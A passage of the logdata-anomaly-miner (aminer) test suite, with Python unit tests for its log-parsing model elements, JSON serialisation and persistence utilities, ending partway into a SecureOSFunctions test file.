(self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/4" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(ValueError, RepeatedElementDataModelElement, "", fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, None, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, b"path", fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, True, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, 123, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, 123.22, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, {"id": "path"}, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, ["path"], fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, [], fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, (), fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, set(), fixed_dme) def test4repeated_element_input_validation(self): """Check if repeated_element is validated.""" self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, "string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, True) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, 123) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, []) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, set()) def test5min_repeat_input_validation(self): """Check if min_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=-1) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=set()) def test6max_repeat_input_validation(self): """Check if max_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=0) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=10, min_repeat=11) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=set()) def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/SequenceModelElementTest.py000066400000000000000000000133141437606560100307060ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.SequenceModelElement import SequenceModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class SequenceModelElementTest(TestBase): """Unittests for the SequenceModelElement.""" id_ = "sequence" path = "path" children = [DummyFixedDataModelElement("0", b"string0 "), DummyFixedDataModelElement("1", b"string1 "), DummyFixedDataModelElement("2", b"string2")] match_elements = [MatchElement("path/sequence/0", b"string0 ", b"string0 ", None), MatchElement("path/sequence/1", b"string1 ", b"string1 ", None), MatchElement("path/sequence/2", b"string2", b"string2", None)] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, self.match_elements) data = b"string0 string1 string2 other string follows" value = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, self.match_elements) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 " match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 string3" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string0 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, SequenceModelElement, "", self.children) self.assertRaises(TypeError, SequenceModelElement, None, self.children) self.assertRaises(TypeError, SequenceModelElement, b"path", self.children) self.assertRaises(TypeError, SequenceModelElement, True, self.children) self.assertRaises(TypeError, SequenceModelElement, 123, self.children) self.assertRaises(TypeError, SequenceModelElement, 123.22, self.children) self.assertRaises(TypeError, SequenceModelElement, {"id": "path"}, self.children) self.assertRaises(TypeError, SequenceModelElement, ["path"], self.children) self.assertRaises(TypeError, SequenceModelElement, [], self.children) self.assertRaises(TypeError, SequenceModelElement, (), self.children) self.assertRaises(TypeError, SequenceModelElement, set(), self.children) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = SequenceModelElement(self.id_, self.children) data = b"string0 string1 string2" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/VariableByteDataModelElementTest.py000066400000000000000000000130141437606560100322760ustar00rootroot00000000000000import unittest from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class VariableByteDataModelElementTest(TestBase): """Unittests for the VariableByteDataModelElement.""" id_ = "variable" path = "path" alphabet = b"abcdefghijklmnopqrstuvwxyz " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklm nopqrstuvwxyz.!?" value = b"abcdefghijklm nopqrstuvwxyz" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"!abcdefghijklm nopqrstuvwxyz.!?" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, VariableByteDataModelElement, "", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, None, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, b"path", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, True, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123.22, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, {"id": "path"}, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, ["path"], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, [], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, (), self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, set(), self.alphabet) def test4alphabet_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, "string") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, None) self.assertRaises(ValueError, VariableByteDataModelElement, self.id_, b"") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, True) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, []) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ()) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = VariableByteDataModelElement(self.id_, self.alphabet) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/WhiteSpaceLimitedDataModelElementTest.py000066400000000000000000000153721437606560100333020ustar00rootroot00000000000000import unittest from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class WhiteSpaceLimitedDataModelElementTest(TestBase): """Unittests for the WhiteSpaceLimitedDataModelElement.""" id_ = "whitespace" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"This+is+a+string+without+any+whitespaces." match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) data = b"This is a string with whitespaces." value = b"This" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"spacetab: \t,tab:\t" value = b"spacetab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\ttab" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" space" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, WhiteSpaceLimitedDataModelElement, "") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, None) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, b"path") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, True) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123.22) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, {"id": "path"}) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ["path"]) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, []) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ()) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, set()) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = WhiteSpaceLimitedDataModelElement(self.id_) data = b"space: ,tab:\t" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/__init__.py000066400000000000000000000000001437606560100255260ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/000077500000000000000000000000001437606560100227415ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/JsonUtilTest.py000066400000000000000000000063741437606560100257340ustar00rootroot00000000000000import unittest from aminer.util.JsonUtil import encode_object, decode_object, dump_as_json, load_json from unit.TestBase import TestBase class JsonUtilTest(TestBase): """Unittests for the JsonUtil class.""" def test1encode_decode_strings2_json(self): """This test method encodes/decodes string objects into/from the JSON-format.""" s = 'this is a normal string to be serialized' pre = 'string:' enc = encode_object(s) self.assertEqual(enc, pre + s) self.assertEqual(decode_object(enc), s) def test2encode_decode_bytes2_json(self): """This test method encodes/decodes bytes objects into/from the JSON-format.""" s = b'this is a bytestring to be serialized' pre = b'bytes:' enc = encode_object(s) self.assertEqual(enc, pre.decode() + s.decode()) self.assertEqual(decode_object(s), s) self.assertEqual(decode_object(enc), s) s = bytes.fromhex('001B') enc = encode_object(s) self.assertEqual(enc, pre.decode() + '%00%1b') self.assertEqual(decode_object(enc), s) def test3encode_decode_iterables2_json(self): """This test method encodes/decodes list, tuple and dictionary objects into/from the JSON-format.""" lis = [b'1', '2', 3, ['4']] res = ['bytes:1', 'string:2', 3, ['string:4']] enc = encode_object(lis) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) tup = (b'1', '2', 3, ['4']) enc = encode_object(tup) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) dictionary = {'user': 'defaultUser', 'password': b'topSecret', 'id': 25} enc = encode_object(dictionary) self.assertEqual(enc, {'string:user': 'string:defaultUser', 'string:password': 'bytes:topSecret', 'string:id': 25}) self.assertEqual(decode_object(enc), dictionary) def test4encode_decode_booleans2_json(self): """This test method encodes/decodes booleans objects into/from the JSON-format.""" boolean1 = True enc = encode_object(boolean1) self.assertEqual(enc, True) self.assertEqual(decode_object(enc), True) def test5encode_decode_decimals2_json(self): """This test method encodes/decodes integer and float objects into/from the JSON-format.""" integer1 = 125 enc = encode_object(integer1) self.assertEqual(enc, 125) self.assertEqual(decode_object(enc), 125) def test6dump_as_json(self): """ This test method serializes an object by encoding it into a JSON-formatted string. Annotation: external classes and methods are not tested and assumed to be working as intend. """ tup = (b'1', '2', 3, ['4']) self.assertEqual(dump_as_json(tup), '["bytes:1", "string:2", 3, ["string:4"]]') def test7load_json(self): """ This test method loads a serialized string and deserializes it by decoding into an object. Annotation: external classes and methods are not tested and assumed to be working as intend. """ obj = '["bytes:1", "string:2", 3, ["string:4"]]' self.assertEqual(load_json(obj), [b'1', '2', 3, ['4']]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/PersistenceUtilTest.py000066400000000000000000000205461437606560100273040ustar00rootroot00000000000000import unittest import sys import io from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.util import PersistenceUtil from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from unit.TestBase import TestBase class PersistenceUtilTest(TestBase): """Unittests for the PersistenceUtil class.""" string = b'25537 uid=2' match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("", match_context_decimal_integer_value_me) fixed_dme = FixedDataModelElement('s1', string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_first_match_me = MatchContext(string) first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me]) match_element_first_match_me = first_match_me.get_match_element('first', match_context_first_match_me) match_context_first_match_me2 = MatchContext(string) first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme]) match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2) def test1persist_multiple_objects_of_single_class(self): """In this test case multiple instances of one class are to be persisted and loaded.""" description = "Test1PersistenceUtil" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me) other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'otherDetector', True) self.analysis_context.register_component(other_new_match_path_detector, description + "2") log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, other_new_match_path_detector) other_new_match_path_detector.receive_atom(log_atom_fixed_dme) PersistenceUtil.persist_all() persistence_data = PersistenceUtil.load_json(new_match_path_detector.persistence_file_name) self.assertTrue( persistence_data in ([self.match_element_fixed_dme.get_path(), self.match_element_decimal_integer_value_me.get_path()], [ self.match_element_decimal_integer_value_me.get_path(), self.match_element_fixed_dme.get_path()])) self.assertEqual(PersistenceUtil.load_json(other_new_match_path_detector.persistence_file_name), [ self.match_element_fixed_dme.get_path()]) def test2persist_multiple_objects_of_multiple_class(self): """In this test case multiple instances of multiple classes are to be persisted and loaded.""" description = "Test2PersistenceUtil" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default2', True) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me) other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'otherDetector2', True) self.analysis_context.register_component(other_new_match_path_detector, description + "2") log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, other_new_match_path_detector) other_new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.analysis_context.register_component(new_match_path_value_combo_detector, description + "3") log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_combo_detector) new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me) PersistenceUtil.persist_all() persistence_data = PersistenceUtil.load_json(new_match_path_detector.persistence_file_name) self.assertTrue( persistence_data in ([self.match_element_fixed_dme.get_path(), self.match_element_decimal_integer_value_me.get_path()], [ self.match_element_decimal_integer_value_me.get_path(), self.match_element_fixed_dme.get_path()])) self.assertEqual(PersistenceUtil.load_json(other_new_match_path_detector.persistence_file_name), [self.match_element_fixed_dme.get_path()]) self.assertEqual(PersistenceUtil.load_json(new_match_path_value_combo_detector.persistence_file_name), ([[log_atom_sequence_me.raw_data]])) def test3_no_unique_persistence_id(self): """Check if a warning is printed if the same persistence_id is used for the same component type.""" old_stderr = sys.stderr new_stderr = io.StringIO() sys.stderr = new_stderr PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = False NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.assertEqual('', new_stderr.getvalue()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) self.assertEqual('Warning: Detectors of type NewMatchPathDetector use the persistence_id "Default" multiple times. Please assign a' ' unique persistence_id for every component.\n', new_stderr.getvalue()) new_stderr.seek(0) new_stderr.truncate(0) NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.assertEqual('Warning: Detectors of type NewMatchPathValueComboDetector use the persistence_id "Default" multiple times. Please' ' assign a unique persistence_id for every component.\n', new_stderr.getvalue()) sys.stderr = old_stderr if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/SecureOSFunctionsTest.py000066400000000000000000000140061437606560100275350ustar00rootroot00000000000000import unittest import sys import os import socket from _io import StringIO # skipcq: BAN-B404 import subprocess from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor, receive_annoted_file_descriptor from aminer.util import SecureOSFunctions from aminer.input.LogStream import UnixSocketLogDataResource from unit.TestBase import TestBase class SecureOSFunctionsTestLocal(TestBase): """This test class must be run locally due to import problems.""" opening_socket = 'Opening socket...' listening = 'Listening...' """This test case is commented out, because it is still not implemented.""" # ''' # A file is tried to be opened by using the secure function. # ''' # def test1_secure_open_file(self): # error = sys.stderr = StringIO() # # 